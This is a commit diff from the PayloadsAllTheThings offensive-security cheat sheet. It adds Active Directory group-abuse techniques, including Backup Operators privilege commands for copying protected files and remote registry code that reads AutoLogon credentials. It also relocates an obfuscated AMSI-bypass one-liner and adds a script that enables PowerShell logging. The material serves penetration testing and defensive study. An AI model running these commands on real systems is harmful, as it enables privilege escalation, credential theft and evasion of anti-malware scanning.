mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-18 17:28:49 +00:00
AD Groups + PowerShell Defenses
This commit is contained in:
parent
f1a85f22b9
commit
36e135776f
@ -92,8 +92,11 @@
|
||||
- [ADFS - Golden SAML](#adfs---golden-saml)
|
||||
- [UnPAC The Hash](#unpac-the-hash)
|
||||
- [Shadow Credentials](#shadow-credentials)
|
||||
- [Active Directory Groups](#active-directory-groups)
|
||||
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
||||
- [Abusing DNS Admins Group](#abusing-dns-admins-group)
|
||||
- [Abusing Schema Admins Group](#abusing-schema-admins-group)
|
||||
- [Abusing Backup Operators Group](#abusing-backup-operators-group)
|
||||
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
|
||||
- [GenericAll](#genericall)
|
||||
- [GenericWrite](#genericwrite)
|
||||
@ -2854,6 +2857,7 @@ Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User vi
|
||||
proxychains python3 wmiexec.py -k -no-pass ez.lab/administrator@ws2.ez.lab
|
||||
```
|
||||
|
||||
## Active Directory Groups
|
||||
|
||||
### Dangerous Built-in Groups Usage
|
||||
|
||||
@ -2927,6 +2931,42 @@ Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccount
|
||||
sc \\dc01 start dns
|
||||
```
|
||||
|
||||
### Abusing Schema Admins Group
|
||||
|
||||
> The Schema Admins group is a security group in Microsoft Active Directory that provides its members with the ability to make changes to the schema of an Active Directory forest. The schema defines the structure of the Active Directory database, including the attributes and object classes that are used to store information about users, groups, computers, and other objects in the directory.
|
||||
|
||||
|
||||
### Abusing Backup Operators Group
|
||||
|
||||
> Members of the Backup Operators group can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to and shut down the computer. This group cannot be renamed, deleted, or moved. By default, this built-in group has no members, and it can perform backup and restore operations on domain controllers.
|
||||
|
||||
This groups grants the following privileges :
|
||||
- SeBackup privileges
|
||||
- SeRestore privileges
|
||||
|
||||
* Get members of the group:
|
||||
```ps1
|
||||
PowerView> Get-NetGroupMember -Identity "Backup Operators" -Recurse
|
||||
```
|
||||
* Enable privileges using [giuliano108/SeBackupPrivilege](https://github.com/giuliano108/SeBackupPrivilege)
|
||||
```ps1
|
||||
Import-Module .\SeBackupPrivilegeUtils.dll
|
||||
Import-Module .\SeBackupPrivilegeCmdLets.dll
|
||||
|
||||
Set-SeBackupPrivilege
|
||||
Get-SeBackupPrivilege
|
||||
```
|
||||
* Retrieve sensitive files
|
||||
```ps1
|
||||
Copy-FileSeBackupPrivilege C:\Users\Administrator\flag.txt C:\Users\Public\flag.txt -Overwrite
|
||||
```
|
||||
* Retrieve content of AutoLogon in the HKLM\SOFTWARE hive
|
||||
```ps1
|
||||
$reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine', 'dc.htb.local',[Microsoft.Win32.RegistryView]::Registry64)
|
||||
$winlogon = $reg.OpenSubKey('SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon')
|
||||
$winlogon.GetValueNames() | foreach {"$_ : $(($winlogon).GetValue($_))"}
|
||||
```
|
||||
|
||||
|
||||
### Abusing Active Directory ACLs/ACEs
|
||||
|
||||
@ -4192,3 +4232,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
|
||||
* [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf)
|
||||
* [Hunt for the gMSA secrets - Dr Nestori Syynimaa (@DrAzureAD) - August 29, 2022](https://aadinternals.com/post/gmsa/)
|
||||
* [Relaying NTLM Authentication from SCCM Clients - Chris Thompson - Jun 30, 2022](https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867)
|
||||
* [Poc’ing Beyond Domain Admin - Part 1 - cube0x0](https://cube0x0.github.io/Pocing-Beyond-DA/)
|
@ -2,26 +2,17 @@
|
||||
|
||||
## Summary
|
||||
|
||||
* [AMSI](#amsi)
|
||||
* [AppLocker](#applocker)
|
||||
* [DPAPI](#dpapi)
|
||||
* [Powershell](#powershell)
|
||||
* [JEA](#jea)
|
||||
* [Anti Malware Scan Interface](#anti-malware-scan-interface)
|
||||
* [Just Enough Administration](#just-enough-administration)
|
||||
* [Contrained Language Mode](#constrained-language-mode)
|
||||
* [Script Block Logging](#script-block-logging)
|
||||
* [Windows Defender Antivirus](#windows-defender-antivirus)
|
||||
* [Windows Defender Application Control](#windows-defender-application-control)
|
||||
* [Windows Defender Firewall](#windows-defender-firewall)
|
||||
|
||||
## AMSI
|
||||
|
||||
> The Anti-Malware Scan Interface (AMSI) is a Windows API (Application Programming Interface) that provides a unified interface for applications and services to integrate with any anti-malware product installed on a system. The API allows anti-malware solutions to scan files and scripts at runtime, and provides a means for applications to request a scan of specific content.
|
||||
|
||||
Find more AMSI bypass: [Windows - AMSI Bypass.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass.md)
|
||||
|
||||
```powershell
|
||||
PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
|
||||
```
|
||||
|
||||
|
||||
## AppLocker
|
||||
|
||||
@ -48,7 +39,18 @@ Refer to [PayloadsAllTheThings/Windows - DPAPI.md](https://github.com/swisskyrep
|
||||
|
||||
## Powershell
|
||||
|
||||
### JEA
|
||||
### Anti Malware Scan Interface
|
||||
|
||||
> The Anti-Malware Scan Interface (AMSI) is a Windows API (Application Programming Interface) that provides a unified interface for applications and services to integrate with any anti-malware product installed on a system. The API allows anti-malware solutions to scan files and scripts at runtime, and provides a means for applications to request a scan of specific content.
|
||||
|
||||
Find more AMSI bypass: [Windows - AMSI Bypass.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass.md)
|
||||
|
||||
```powershell
|
||||
PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
|
||||
```
|
||||
|
||||
|
||||
### Just Enough Administration
|
||||
|
||||
> Just-Enough-Administration (JEA) is a feature in Microsoft Windows Server that allows administrators to delegate specific administrative tasks to non-administrative users. JEA provides a secure and controlled way to grant limited, just-enough access to systems, while ensuring that the user cannot perform unintended actions or access sensitive information.
|
||||
|
||||
@ -62,6 +64,7 @@ Breaking out if JEA:
|
||||
Add-Computer
|
||||
```
|
||||
|
||||
|
||||
### Constrained Language Mode
|
||||
|
||||
Check if we are in a constrained mode: `$ExecutionContext.SessionState.LanguageMode`
|
||||
@ -110,6 +113,29 @@ Check if we are in a constrained mode: `$ExecutionContext.SessionState.LanguageM
|
||||
```
|
||||
|
||||
|
||||
### Script Block Logging
|
||||
|
||||
> Once Script Block Logging is enabled, the script blocks and commands that are executed will be recorded in the Windows event log under the "Windows PowerShell" channel. To view the logs, administrators can use the Event Viewer application and navigate to the "Windows PowerShell" channel.
|
||||
|
||||
Enable Script Block Loggin:
|
||||
|
||||
```ps1
|
||||
function Enable-PSScriptBlockLogging
|
||||
{
|
||||
$basePath = 'HKLM:\Software\Policies\Microsoft\Windows' +
|
||||
'\PowerShell\ScriptBlockLogging'
|
||||
|
||||
if(-not (Test-Path $basePath))
|
||||
{
|
||||
$null = New-Item $basePath -Force
|
||||
}
|
||||
|
||||
Set-ItemProperty $basePath -Name EnableScriptBlockLogging -Value "1"
|
||||
}
|
||||
```
|
||||
|
||||
|
||||
|
||||
## Windows Defender Antivirus
|
||||
|
||||
Also known as `Microsoft Defender`.
|
||||
@ -187,3 +213,4 @@ Also known as `WDAC/UMCI/Device Guard`.
|
||||
## References
|
||||
|
||||
* [SNEAKING PAST DEVICE GUARD - Cybereason - Philip Tsukerman](https://troopers.de/downloads/troopers19/TROOPERS19_AR_Sneaking_Past_Device_Guard.pdf)
|
||||
* [PowerShell about_Logging_Windows - Microsoft Documentation](https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7.3)
|
Loading…
Reference in New Issue
Block a user